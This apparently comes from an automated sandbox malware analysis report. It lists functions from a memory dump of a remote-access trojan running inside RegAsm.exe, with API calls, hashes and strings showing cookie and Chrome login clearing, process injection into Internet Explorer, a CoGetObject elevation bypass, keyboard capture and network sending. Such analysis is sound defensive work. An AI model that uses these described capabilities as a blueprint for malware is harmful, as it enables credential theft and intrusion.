                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$Close$File$FirstNext
                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 3527384056-432212279
                                                  • Opcode ID: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                  • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                  • Opcode Fuzzy Hash: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                  • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                  Function 0040F4AF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                  • API String ID: 3756808967-1743721670
                                                  • Opcode ID: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                  • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                  • Opcode Fuzzy Hash: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                  • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                  Function 00419662 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$1$2$3$4$5$6$7$VG
                                                  • API String ID: 0-1861860590
                                                  • Opcode ID: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                  • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                  • Opcode Fuzzy Hash: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                  • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                  Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0040755C
                                                  • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Object_wcslen
                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                  • API String ID: 240030777-3166923314
                                                  • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                  • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                  • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                  • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                  Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                  • GetLastError.KERNEL32 ref: 0041A84C
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                  • String ID:
                                                  • API String ID: 3587775597-0
                                                  • Opcode ID: 4accfa2daad176f8b5f28278118318dfa0062abe9eed3b7a7428a28b758f59c5
                                                  • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                  • Opcode Fuzzy Hash: 4accfa2daad176f8b5f28278118318dfa0062abe9eed3b7a7428a28b758f59c5
                                                  • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                  Function 00452690 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                  • String ID: JD$JD$JD
                                                  • API String ID: 745075371-3517165026
                                                  • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                  • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                  • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                  • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                  Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                  • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                  • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 1164774033-405221262
                                                  • Opcode ID: f2da73c484f202d7703831838b7ab11600cf4b2b9c4a90d68e51a9d5948ffb1b
                                                  • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                  • Opcode Fuzzy Hash: f2da73c484f202d7703831838b7ab11600cf4b2b9c4a90d68e51a9d5948ffb1b
                                                  • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                  Function 0041C322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                  • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                  • String ID:
                                                  • API String ID: 2341273852-0
                                                  • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                  • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                  • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                  • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                  Function 00419B86 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$CreateFirstNext
                                                  • String ID: 8SG$PXG$PXG$NG$PG
                                                  • API String ID: 341183262-3812160132
                                                  • Opcode ID: 4996a93cb9cc1f14aef934760752e1815303a81af97ed7b758d55349f36a1bef
                                                  • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                  • Opcode Fuzzy Hash: 4996a93cb9cc1f14aef934760752e1815303a81af97ed7b758d55349f36a1bef
                                                  • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                  Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                  • String ID:
                                                  • API String ID: 1888522110-0
                                                  • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                  • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                  • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                  • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                  Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                  • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                  • API String ID: 2127411465-314212984
                                                  • Opcode ID: bd242308892eeed60a03188ed6a612f04b73cb25f5ca5ecf78c8c55943767dc4
                                                  • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                  • Opcode Fuzzy Hash: bd242308892eeed60a03188ed6a612f04b73cb25f5ca5ecf78c8c55943767dc4
                                                  • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                  Function 00449210 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00449292
                                                  • _free.LIBCMT ref: 004492B6
                                                  • _free.LIBCMT ref: 0044943D
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                  • _free.LIBCMT ref: 00449609
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                  • String ID:
                                                  • API String ID: 314583886-0
                                                  • Opcode ID: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                  • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                  • Opcode Fuzzy Hash: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                  • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                  Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                    • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                    • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                    • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                    • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                  • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                  • String ID: !D@$PowrProf.dll$SetSuspendState
                                                  • API String ID: 1589313981-2876530381
                                                  • Opcode ID: 558271a35a8bdba10085a696c11b9306f9ed655432d6f63f913a34884c8f5c77
                                                  • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                  • Opcode Fuzzy Hash: 558271a35a8bdba10085a696c11b9306f9ed655432d6f63f913a34884c8f5c77
                                                  • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                  Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                  • GetLastError.KERNEL32 ref: 0040BA93
                                                  Strings
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                  • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                  • UserProfile, xrefs: 0040BA59
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                  • API String ID: 2018770650-1062637481
                                                  • Opcode ID: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                  • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                  • Opcode Fuzzy Hash: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                  • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                  Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                  • GetLastError.KERNEL32 ref: 004179D8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                  • String ID: SeShutdownPrivilege
                                                  • API String ID: 3534403312-3733053543
                                                  • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                  • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                  • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                  • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                  Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00409293
                                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                  • FindClose.KERNEL32(00000000), ref: 004093FC
                                                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                    • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                    • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                  • FindClose.KERNEL32(00000000), ref: 004095F4
                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                  • String ID:
                                                  • API String ID: 1824512719-0
                                                  • Opcode ID: cd608265bd1be8b07682067f0b9d09a1daa7a366b7b1d0b2306626e8246afaf9
                                                  • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                  • Opcode Fuzzy Hash: cd608265bd1be8b07682067f0b9d09a1daa7a366b7b1d0b2306626e8246afaf9
                                                  • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                  Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                  • String ID:
                                                  • API String ID: 276877138-0
                                                  • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                  • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                  • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                  • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                  Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                  • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                  • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                  • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                  • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                  Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                                                  • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                  • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                  • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID: SETTINGS
                                                  • API String ID: 3473537107-594951305
                                                  • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                  • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                  • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
